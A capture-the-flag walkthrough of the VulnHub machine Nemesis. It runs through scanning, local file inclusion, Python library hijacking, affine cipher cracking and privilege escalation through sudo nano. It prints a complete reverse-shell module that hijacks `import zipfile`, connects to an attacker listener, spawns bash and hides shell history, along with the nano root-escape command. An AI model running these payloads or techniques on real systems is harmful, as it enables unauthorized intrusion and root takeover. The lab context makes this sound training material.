VulnHub Machine Practice (4)

XTTF, 2021-02-18

IA: Nemesis (1.0.1) walkthrough

Information gathering

First, use nmap to discover live hosts on the subnet (-sP is the legacy spelling of -sn, a ping sweep without a port scan); the target comes back as 192.168.0.102.

nmap -sP 192.168.0.0/24

A service/vuln-script scan of the target finds only port 80 open. Note that without -p- this only covers nmap's default top 1000 TCP ports, which is why the high ports below are missed at this stage.

nmap -v --script vuln 192.168.0.102

Walkthrough

The home page leaks a set of login credentials.

Logging in to the site with those credentials leads to a page that reads "website defaced".

Next, a full-port scan of the target with nmap:

nmap -A -p- 192.168.0.102

Two new ports turn up that the default scan did not cover:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 19:57 CST
Nmap scan report for 192.168.0.102
Host is up (0.00069s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home
52845/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Ethereal - Free Responsive HTML5 Website Template
52846/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 70:c4:06:3e:3c:0f:28:b3:dc:66:96:30:d7:c8:d5:63 (RSA)
|   256 e3:ca:81:e9:b5:b0:bc:21:61:42:04:3b:85:ca:57:1b (ECDSA)
|_  256 fd:b8:04:e1:e0:0f:aa:21:e5:79:68:78:1f:05:15:59 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The new site on port 52845 has an input field.

Submitting arbitrary text produces a popup saying the message has been saved to a file, which suggests the input controls a file operation and is worth a closer look.

Capture the request in Burp and fuzz that parameter.

This confirms an LFI (local file inclusion) vulnerability.

Trying SSH as the thanos user shows that only public-key authentication is accepted, so the next step is to read that user's private key through the LFI, save it locally with mode 600 and pass it to ssh with -i:

ssh -p 52846 thanos@192.168.0.102
The authenticity of host '[192.168.0.102]:52846 ([192.168.0.102]:52846)' can't be established.
ECDSA key fingerprint is SHA256:rz9ROPFbYXsfi1wkrQvJ0QrmRVoOdRGy3+KBHKEoNuU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.102]:52846' (ECDSA) to the list of known hosts.
thanos@192.168.0.102: Permission denied (publickey).

This gives the first flag.

There is also a Python script, backup.py, and /tmp contains website.zip, the archive it produces:

cat backup.py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/tmp/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

I got stuck here until a YouTube walkthrough pointed to Python library hijacking (https://rastating.github.io/privilege-escalation-via-python-library-hijacking/): when a script does `import zipfile`, the interpreter walks the directories in sys.path in order and loads the first match, so a writable directory that is searched before the standard library lets you substitute your own module. The search order can be printed with the following one-liner (Python 2 print syntax, matching the target's interpreter):

python -c 'import sys; print "\n".join(sys.path)'

Running it on the target gives the search path below. The very first entry is not shown: with -c it is the empty string (the current directory), and when a script file is run it is that script's own directory, which is searched before every directory in this list:

/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages

Since backup.py's own directory is searched before /usr/lib/python2.7 and is writable, dropping a zipfile.py containing a reverse shell into the same directory hijacks `import zipfile` the next time the script runs:

import os
import pty
import socket

lhost = "192.168.0.109"   # attacker's listener address (e.g. nc -lvnp 4444)
lport = 4444

# backup.py does zipfile.ZipFile(..., zipfile.ZIP_DEFLATED) and then calls
# .write() and .close(); provide just enough of that surface that the script
# does not raise before or after the payload. (The real constant is 8; the
# value is irrelevant here because the stubs ignore their arguments.)
ZIP_DEFLATED = 0

class ZipFile:
    def __init__(self, *args):
        return

    def write(*args):
        return

    def close(*args):
        return

# Module-level code runs at import time, i.e. the moment backup.py executes
# `import zipfile`, with the privileges of whoever runs backup.py.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)   # wire stdin, stdout and stderr to the socket
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')   # keep the shell out of bash history
pty.spawn("/bin/bash")
s.close()

This gives the second flag.

Opening root.txt gives a hint that the password has been encrypted with encrypt.py:

# Affine cipher over A-Z: E(x) = (a*x + b) mod 26 with key = [a, b];
# a must be coprime to 26 for modinv() to exist.
def egcd(a, b):
    # extended Euclid: returns (gcd, x, y) with a*x + b*y == gcd
    x,y, u,v = 0,1, 1,0
    while a != 0:
        q, r = b//a, b%a
        m, n = x-u*q, y-v*q
        b,a, x,y, u,v = a,r, u,v, m,n
    gcd = b
    return gcd, x, y

def modinv(a, m):
    gcd, x, y = egcd(a, m)
    if gcd != 1:
        return None
    else:
        return x % m

def affine_encrypt(text, key):
    return ''.join([ chr((( key[0]*(ord(t) - ord('A')) + key[1] ) % 26)
                  + ord('A')) for t in text.upper().replace(' ', '') ])

def affine_decrypt(cipher, key):
    return ''.join([ chr((( modinv(key[0], 26)*(ord(c) - ord('A') - key[1]))
                    % 26) + ord('A')) for c in cipher ])

def main():
    text = 'REDACTED'
    affine_encrypted_text="FAJSRWOXLAXDQZAWNDDVLSU"
    key = [REDACTED,REDACTED]
    print('Decrypted Text: {}'.format(affine_decrypt(affine_encrypted_text, key)))

if __name__ == '__main__':
    main()

With help from a friend (and the site https://www.dcode.fr/), the plaintext came out as ENCRYPTIONISFUNPASSWORD.
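No online solver is needed for this step. The affine cipher has 12 multipliers that are invertible mod 26 and 26 shifts, so the entire key space is 312 keys and can be enumerated offline; and once two plaintext letters are known, two (plaintext, ciphertext) pairs pin the key down algebraically. The following is an added example, not code from the machine or from dcode.fr: it brute-forces the ciphertext from encrypt.py with a small constructed wordlist as the scoring function, and separately recovers the key from two known letter pairs, including the case where the chosen pair does not determine the key uniquely.

```python
"""Brute-force and known-plaintext attacks on the affine cipher from encrypt.py.

Added example for this walkthrough; not code from the target or from dcode.fr.
The cipher is E(x) = (a*x + b) mod 26 over A-Z with a coprime to 26, so the
key space is 12 * 26 = 312 keys.
"""
from math import gcd

M = 26                                   # alphabet size
CIPHERTEXT = "FAJSRWOXLAXDQZAWNDDVLSU"    # taken from encrypt.py on the target

# Constructed scoring list: common English fragments plus CTF-flavoured words.
WORDS = ("THE", "AND", "ING", "ION", "TION", "IS", "FUN", "KEY", "ROOT",
         "FLAG", "PASS", "WORD", "PASSWORD")


def modinv(a, m=M):
    """Multiplicative inverse of a mod m by search (a must be coprime to m)."""
    return next(x for x in range(1, m) if (a * x) % m == 1)


def affine_decrypt(cipher, a, b):
    """D(y) = a^-1 * (y - b) mod 26 over A-Z, the inverse of encrypt.py's E(x)."""
    inv = modinv(a)
    return "".join(chr((inv * (ord(c) - ord("A") - b)) % M + ord("A")) for c in cipher)


def valid_keys():
    """All (a, b) with a invertible mod 26: 12 * 26 = 312 keys."""
    return [(a, b) for a in range(1, M) if gcd(a, M) == 1 for b in range(M)]


def english_score(text):
    """Crude plaintext score: total length of wordlist hits in the text."""
    return sum(len(w) for w in WORDS if w in text)


def brute_force(cipher):
    """Try every key and return (key, plaintext) with the highest score."""
    best = max(valid_keys(), key=lambda k: english_score(affine_decrypt(cipher, *k)))
    return best, affine_decrypt(cipher, *best)


def recover_key(pairs):
    """Known-plaintext attack from two (plain, cipher) letter pairs.

    Subtracting the two equations c_i = a*p_i + b gives
    a*(p1 - p2) = c1 - c2 (mod 26), which has a unique solution only when
    p1 - p2 is itself invertible mod 26; otherwise a different pair is needed.
    """
    (p1, c1), (p2, c2) = pairs
    p1, c1, p2, c2 = (ord(ch) - ord("A") for ch in (p1, c1, p2, c2))
    dp = (p1 - p2) % M
    if gcd(dp, M) != 1:
        raise ValueError("plaintext letters differ by a non-invertible amount; pick another pair")
    a = ((c1 - c2) * modinv(dp)) % M
    b = (c1 - a * p1) % M
    return a, b


if __name__ == "__main__":
    key, plain = brute_force(CIPHERTEXT)
    print("brute force:     key =", key, "plaintext =", plain)
    # Two letters of the recovered plaintext are enough to confirm the key.
    print("known plaintext: key =",
          recover_key([(plain[1], CIPHERTEXT[1]), (plain[0], CIPHERTEXT[0])]))
```

The brute force recovers the same ENCRYPTIONISFUNPASSWORD the author obtained, and the known-plaintext routine shows why a pair like (E, F) and (A, N) is useless on its own: E and A differ by 4, which shares a factor with 26, so two multipliers satisfy the equation and a third letter would be needed to disambiguate.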

With that password, run sudo -l as carlos:

[sudo] password for carlos:
Matching Defaults entries for carlos on nemesis:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User carlos may run the following commands on nemesis:
    (root) /bin/nano /opt/priv

Privilege escalation through nano: ^R (Read File) followed by ^X (Execute Command) opens a command prompt inside the editor, and because nano itself is running as root via sudo, whatever is typed there runs as root. The redirections send the new shell's stdout and stderr to the terminal that nano still holds on fd 0:

sudo nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

This yields a root shell.

Read the final flag.

Sites used